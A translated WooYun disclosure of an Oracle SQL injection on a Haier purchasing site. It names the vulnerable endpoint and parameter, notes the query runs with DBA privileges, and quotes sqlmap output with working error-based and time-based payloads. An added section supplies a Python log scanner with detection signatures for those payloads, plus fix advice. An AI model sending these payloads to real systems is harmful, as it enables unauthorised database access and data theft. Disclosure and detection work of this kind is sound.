
Vulnerability summary

Defect ID: wooyun-2014-089303

Title: Oracle injection on an important Haier Group subsite

Vendor: Haier Group

Author: 淡蓝色の忧伤

Submitted: 2014-12-30 16:59

Fix deadline: 2015-02-13 17:00

Disclosed: 2015-02-13 17:00

Type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: Vendor confirmed

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-12-30: Details sent to the vendor, awaiting vendor handling
2014-12-31: Vendor confirmed; details visible to the vendor only
2015-01-10: Details disclosed to core white hats and domain experts
2015-01-20: Details disclosed to regular white hats
2015-01-30: Details disclosed to intern white hats
2015-02-13: Details disclosed to the public

Brief description:

Haier bulk raw-material purchasing and sales platform

Details:

Figure: homepage screenshot (首页.png)

Vulnerable page:
http://dzll.haier.net:8888/providerUnlock.jsp
POST parameter "procode=1"
And it runs with DBA privileges.

Figure: injection screenshot (注入.png)

Figure: 17 databases screenshot (17数据库.png)


sqlmap identified the following injection points with a total of 175 HTTP(s) requests:
---
Place: POST
Parameter: procode
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: procode=1' AND 3366=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (3366=3366) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(106)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'Vbzc'='Vbzc
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: procode=1' AND 6134=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(98)||CHR(79)||CHR(81),5) AND 'xOtq'='xOtq
---
[10:25:53] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:25:53] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 98 times
[10:25:53] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\dzll.haier.net'
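As an added example (not part of the original report, and not code from Haier or WooYun), the following Python scans constructed request-log lines for the two Oracle techniques sqlmap reported against this endpoint, the XMLType error-based payload and the DBMS_PIPE.RECEIVE_MESSAGE time-based one, and counts HTTP 500 responses per endpoint, the burst sqlmap itself noted (98 errors). The log line format, the sample lines and the error threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample of application request log lines (not taken from the report).
# Assumed format: "<time> <method> <path> <status> body=<request body>"
SAMPLE_LOG = """\
10:25:40 POST /providerUnlock.jsp 200 body=procode=1
10:25:41 POST /providerUnlock.jsp 500 body=procode=1'
10:25:42 POST /providerUnlock.jsp 500 body=procode=1' AND 3366=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113))) FROM DUAL) AND 'Vbzc'='Vbzc
10:25:48 POST /providerUnlock.jsp 200 body=procode=1' AND 6134=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(98),5) AND 'xOtq'='xOtq
10:25:49 GET /index.jsp 200 body=
"""

LINE_RE = re.compile(
    r"^(?P<time>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) body=(?P<body>.*)$"
)

# Signatures for the two Oracle techniques sqlmap reported, plus the CHR()||
# concatenation both payloads use to avoid literal quotes.
SIGNATURES = {
    "oracle-error-based-xmltype": re.compile(r"\bXMLType\s*\(", re.I),
    "oracle-time-based-dbms_pipe": re.compile(r"\bDBMS_PIPE\.RECEIVE_MESSAGE\b", re.I),
    "chr-concat-obfuscation": re.compile(r"CHR\(\d+\)\s*\|\|", re.I),
}


def classify_body(body):
    """Return the names of every signature that matches the URL-decoded request body."""
    decoded = unquote_plus(body)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def analyze(log_text, error_threshold=2):
    """Flag signature hits and endpoints whose HTTP 500 count reaches the threshold."""
    hits, errors = [], Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not follow the assumed format
        if m["status"] == "500":
            errors[m["path"]] += 1
        tags = classify_body(m["body"])
        if tags:
            hits.append((m["time"], m["path"], tags))
    bursts = {path: n for path, n in errors.items() if n >= error_threshold}
    return {"hits": hits, "error_bursts": bursts}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

On the sample, both injected requests are tagged and /providerUnlock.jsp is reported for its 500 burst; a clean request such as procode=1 yields no tags. Parameterizing the procode query and running the application under a non-DBA database account are the fixes the report leaves unstated.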

Proof of vulnerability:


Fix recommendation:

You know the drill.

Copyright notice: when reposting, please credit 淡蓝色の忧伤@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-12-31 17:30

Vendor reply:

Thanks to 淡蓝色の忧伤 of the WooYun platform for the testing and the heads-up; we have assigned staff to handle it.

Latest status:

None yet